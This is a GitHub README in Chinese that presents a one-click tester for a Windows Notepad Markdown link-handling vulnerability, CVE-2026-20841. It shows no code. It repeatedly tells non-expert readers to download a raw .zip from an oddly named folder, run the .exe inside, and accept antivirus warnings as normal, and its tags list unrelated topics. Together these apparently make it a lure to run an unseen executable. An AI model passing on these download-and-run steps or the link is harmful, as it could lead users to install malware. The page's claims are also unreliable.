hamzamalik3461/CVE-2026-20841

GitHub: hamzamalik3461/CVE-2026-20841

Stars: 0 | Forks: 0

# 🛡️ CVE-2026-20841 - Windows Notepad 安全测试工具 [![下载发布版本](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip) ## ⚠️ 什么是 CVE-2026-20841? CVE-2026-20841 是 Windows Notepad 应用程序中的一个已知安全弱点。它影响 Markdown 功能,该功能允许 Notepad 显示带有可点击链接的格式化文本。出现此弱点的原因是,在 Notepad 内部运行的 Markdown 引擎没有限制其允许的链接类型(称为 URL 协议)。这意味着攻击者可以创建一个链接,当点击该链接时,会导致 Notepad 运行用户无意运行的程序或命令。 此工具提供了一个 **概念验证 (PoC)** 来演示此安全缺陷是如何运作的。它帮助安全研究人员和技术专家了解漏洞的原理,并测试系统是否面临风险。 ## 💻 谁应该使用此工具? 本项目专为以下人群设计: - 了解 Windows Notepad 中 CVE-2026-20841 的风险 - 测试其系统是否存在此安全问题 - 改进针对远程代码执行攻击的安全措施 运行此软件无需编程技能。它最适合 IT 专业人员或想要检查其 Windows 设备的好奇用户。 ## 🚀 入门指南 ### 系统要求 在使用此软件之前,请确保您的计算机符合以下要求: - 运行 **Windows 10** 或更高版本 - 已安装 Notepad 应用程序(Windows 默认包含) - 互联网连接以下载文件 - 足够的磁盘空间用于下载(小于 10 MB) ### 必要权限 测试工具可能需要权限才能在您的 PC 上运行程序。您可能会看到 Windows Defender 或防病毒软件警告。这是正常的,因为该工具模拟了真实攻击的运作方式。 您应该只在自己拥有或获得测试许可的计算机上运行该工具。 ## 📥 下载与安装 要获取该软件,请执行以下操作: 1. **前往发布页面。** 点击这个大按钮访问下载区域: [![下载发布版本](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip) 2. **在页面上选择最新的版本**。 寻找适合您系统的文件(通常是 `.exe` 或 `.zip` 文件)。 3. **下载文件。** 点击文件名链接开始下载。 4. **运行或解压软件。** - 如果是 `.exe` 文件,双击它以运行。 - 如果是 `.zip` 文件,右键单击并选择“全部解压缩”,然后打开文件夹并双击其中的 `.exe` 文件。 5. **按照屏幕上的说明操作。** 软件将指导您完成测试过程。 ## 🧭 如何使用该软件 安装后,您将看到一个带有说明的简单窗口。操作步骤如下: - **步骤 1:** 点击“Run Test”按钮开始测试。 - **步骤 2:** 软件将模拟一个包含特殊链接的 Markdown 文件。 - **步骤 3:** 它将显示您的 Notepad 是否允许不安全的可点击链接。 - **步骤 4:** 在应用程序内或桌面上的文件中查看测试报告。 ## 🔍 此测试有什么作用? 该工具创建一个包含使用特殊 URL 处理程序链接的虚假 Markdown 文件。通常,这些链接不应在未经许可的情况下打开程序。但由于 CVE-2026-20841,Notepad 并没有阻止它们。 当您运行测试时,软件会尝试在 Notepad 中打开这些链接。如果成功,说明 Notepad 存在漏洞,可能允许攻击者运行有害代码。 ## 🛠 功能特性 - 简单的一键测试启动 - 清晰的报告显示您的系统是否受影响 - 为非专家设计的简单用户界面 - 支持最新的 Windows 版本 - 下载体积小 ## 🔄 如何更新 为了保持测试的准确性,请在有新版本可用时下载: 1. 再次访问同一个发布页面: [https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip) 2. 在顶部找到最新版本。 3. 按照下载部分的说明下载并运行新文件。 ## 👥 获取帮助与支持 如果您遇到问题,可以: - 查看 GitHub 页面上的“Issues”标签,看看其他人是否有同样的问题 - 使用“Discussions”页面进行问答 - 在存储库的主页上找到开发者的联系信息 ## 🔒 保持安全 此工具展示了黑客如何利用安全漏洞。请负责任地使用它: - 不要在您不拥有或未获得测试许可的设备上使用。 - 始终保持您的软件(包括 Windows)处于最新状态。 - 避免点击未知文件或电子邮件中的可疑链接。 ## 🗂 相关主题 本项目涉及: - Windows Notepad 的安全研究 - 命令注入漏洞 - 远程代码执行 (RCE) 风险 - 网络安全意识 - 漏洞测试工具 您现在可以通过访问下载页面开始测试: [下载 CVE-2026-20841 工具](https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip)
标签:Conpot, CVE-2026-20841, DNS 反向解析, Go语言工具, IP 地址批量处理, Markdown安全, PoC验证工具, RCE, URL协议, URL发现, Windows 10, Windows Notepad, Windows安全, 命令执行, 安全检测, 恶意链接, 攻击模拟, 漏洞分析, 系统漏洞, 编程工具, 网络安全, 路径探测, 远程代码执行, 防御加固, 隐私保护, 驱动签名利用